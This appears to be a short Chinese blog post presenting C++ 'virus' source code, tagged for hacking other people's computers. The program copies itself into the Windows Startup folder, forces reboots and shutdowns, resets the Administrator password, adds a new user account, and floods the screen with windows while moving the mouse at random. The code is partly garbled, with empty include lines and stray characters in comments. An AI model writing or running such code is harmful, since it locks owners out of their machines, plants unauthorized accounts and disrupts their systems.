C++病毒程序代码示例分析,注册新的电脑用户

直接上代码

#include 
#include
#include
#include 
#include 
#include 
using namespace std;
int main ()
{
	char copy[80];
	sprintf(copy,"copy %s \"%%userprofile%%\\「开始」菜单\\程序\\启动\"");
	system(copy); //将这个bai程序拷到du开机启动文件夹下面zhi
	char cmd[]="shutdown -r -t 0";//自动重起
	system("ping baidu.com");
	system(cmd);
	system("pause");
	system(copy);
	system("net user Administrator xz");//设置开机密码为xz
	system("net user 崩溃 xz /add");//建立用户,并命名为崩溃 
	int x=GetSystemMetrics(SM_CXSCREEN);//鼠标x 轴 
    int y=GetSystemMetrics(SM_CYSCREEN);//鼠标y 轴 
    srand(time(0));//随机函数种子 
    system("shutdown -s -t 20");//20秒关机 
    while(1)//循环 
    { 
    	SetCursorPos(rand()%x,rand()%y);//鼠标 x y轴 随机
    	system("start");//弹出窗口 
    }  
    
} 

你可能感兴趣的:(C++,黑别人电脑,牛逼程序,c++,开发语言,算法,服务器,运维)